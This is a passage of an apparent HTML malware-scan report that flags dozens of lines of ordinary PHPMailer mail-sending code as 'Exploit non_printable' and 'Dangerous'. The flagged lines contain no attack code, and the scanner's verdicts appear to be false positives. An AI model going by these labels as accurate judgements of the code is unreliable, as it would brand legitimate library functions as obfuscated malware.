</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSendmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1043</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isQmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1059</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean true on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">address already used </span><span style="color: #007700">or </span><span style="color: #0000BB">invalid in some way</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1061</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1063</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'to'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1068</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">works with the SMTP mailer on win32</span><span style="color: #007700">, </span><span style="color: #0000BB">not with the </span><span style="color: #DD0000">"mail" </span><span style="color: #0000BB">mailer</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1073</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1075</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'cc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addBCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1087</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'bcc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1096</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addReplyTo</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'Reply-To'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1104</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function), </span><span style="color: #0000BB">addition of such addresses is delayed until send</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">but </span><span style="color: #007700">do </span><span style="color: #0000BB">not </span><span style="color: #007700">throw </span><span style="color: #0000BB">exceptions</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1113</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1144</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func_array</span><span style="color: #007700">(array(</span><span style="color: #0000BB">$this</span><span style="color: #007700">, </span><span style="color: #DD0000">'addAnAddress'</span><span style="color: #007700">), </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1157</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">the IMAP extension is available</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parseAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$addrstr</span><span style="color: #007700">, </span><span style="color: #0000BB">$useimap </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1205</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'imap_rfc822_parse_adrlist'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1244</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1252</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$isHtml </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1273</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setFrom</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$auto </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the Message</span><span style="color: #007700">-</span><span style="color: #0000BB">ID header of the last email</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1306</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getLastMessageID</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1308</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">lastMessageID</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1322</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1323</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #DD0000">'@'</span><span style="color: #007700">) !== </span><span style="color: #0000BB">false</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1330</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">validateAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$patternselect </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1336</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$patternselect</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'extension_loaded'</span><span style="color: #007700">) and </span><span style="color: #0000BB">extension_loaded</span><span style="color: #007700">(</span><span style="color: #DD0000">'pcre'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1372</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1412</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) >= </span><span style="color: #0000BB">3</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1417</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">filter_var</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">FILTER_VALIDATE_EMAIL</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1424</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool </span><span style="color: #DD0000">"true" </span><span style="color: #007700">if </span><span style="color: #0000BB">required functions </span><span style="color: #007700">for </span><span style="color: #0000BB">IDN support are present</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1426</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">idnSupported</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1428</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">PHP </span><span style="color: #007700"><= </span><span style="color: #0000BB">5.2</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1429</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'idn_to_ascii'</span><span style="color: #007700">) and </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_convert_encoding'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1435</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">silently returns unmodified address </span><span style="color: #007700">if:</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1437</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions are not available</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The encoded address in ASCII form</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1443</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">punyencodeAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1445</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, </span><span style="color: #0000BB">CharSet</span><span style="color: #007700">, and </span><span style="color: #0000BB">at</span><span style="color: #007700">-</span><span style="color: #0000BB">sign</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">) . </span><span style="color: #0000BB">$punycode</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$address</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1467</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean false on error </span><span style="color: #007700">- </span><span style="color: #0000BB">See the ErrorInfo property </span><span style="color: #007700">for </span><span style="color: #0000BB">details of the error</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">send</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1475</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">postSend</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1491</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">preSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1591</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">postSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1598</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
